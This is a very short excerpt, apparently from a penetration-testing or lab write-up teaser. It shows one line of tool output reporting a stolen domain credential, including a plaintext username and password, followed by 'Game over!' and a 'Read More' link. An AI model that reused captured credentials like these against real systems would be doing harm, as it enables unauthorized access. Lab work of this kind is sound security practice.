[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /


Game over!

Read More